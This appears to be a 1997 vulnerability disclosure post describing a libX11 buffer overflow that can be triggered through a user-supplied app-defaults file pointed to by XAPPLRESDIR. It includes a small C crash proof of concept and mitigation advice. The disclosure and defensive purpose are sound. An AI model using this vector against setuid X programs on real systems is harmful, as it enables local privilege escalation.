You are not safe from attack.
X resources can be specified in a number of manners, only one of which
involves command line parameters. One way of specifing resources is via
an applications default file (usually found in
<xroot>/lib/X11/app-defaults). This directory is normally non-writable
by users, however users can specify their own application files to be
read (and indeed change the default location of the app-defaults
directory via the XAPPLRESDIR environment variable). Data in these files
is read in at run time and passed through the same GetDatabase function
call which contains the buffer overflow bug.
Malicious users can therefore hide buffer overflow exploit code in such
a file and therefore obviate the need for the code to be in command line
arguments (or indeed an environment variable). This effectively renders
wrappers useless against this form of attack.
You can test this yourself by creating a file full of some character
(say 'x's) of a reasonable length (say 20k long) called 'XTerm' in your
home directory (capitals are important).
Set the environment variable XAPPLRESDIR to be your home directory (you
will only have to do this if it is already pointing somewhere else, or
you have set some of the other X resource enviroment variables like
XUSERFILESEARCHPATH), and then run xterm. xterm will then segmentation
fault/bus error etc.
Either that or compile and run the short C program at the end of this
message which does the same thing...
The only solution I can see (until a bug fix comes along) is to
chmod u-s every suid file linked against libX11
Regards,
David
p.s. all the references to Solaris 5.5.1 in my post the other day should
of course have been Solaris 2.5.1 (or SunoS 5.5.1).
p.p.s. looks like AUSCERT are putting something together on this so
(fingers crossed) there will be vendor patches soon....
-- David Hedley (hedley@cs.bris.ac.uk) finger hedley@cs.bris.ac.uk for PGP key Computer Graphics Group | University of Bristol | UK
/* crash_xterm.c by DCRH 29/5/97. * * You may or may not need your DISPLAY set up correctly for this to * work - depends on the platform. * */
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h>
void main(void) { char *filename, *resdir, *home; int i, len; FILE *fp;
home = getenv("HOME"); if (!home) exit(2);
len = strlen(home);
/* No buffer overflows here sir! */ filename = malloc(len + 7); sprintf(filename, "%s/XTerm", home); resdir = malloc(len + 13); sprintf(resdir,"XAPPLRESDIR=%s", home);
putenv(resdir);
if ((fp = fopen(filename, "w")) == NULL) exit(1);
for (i = 0; i < 20000; i++) fputc('x', fp);
fclose(fp);
printf("Running xterm....\n"); execlp("xterm", "xterm", 0); perror("exec failed"); }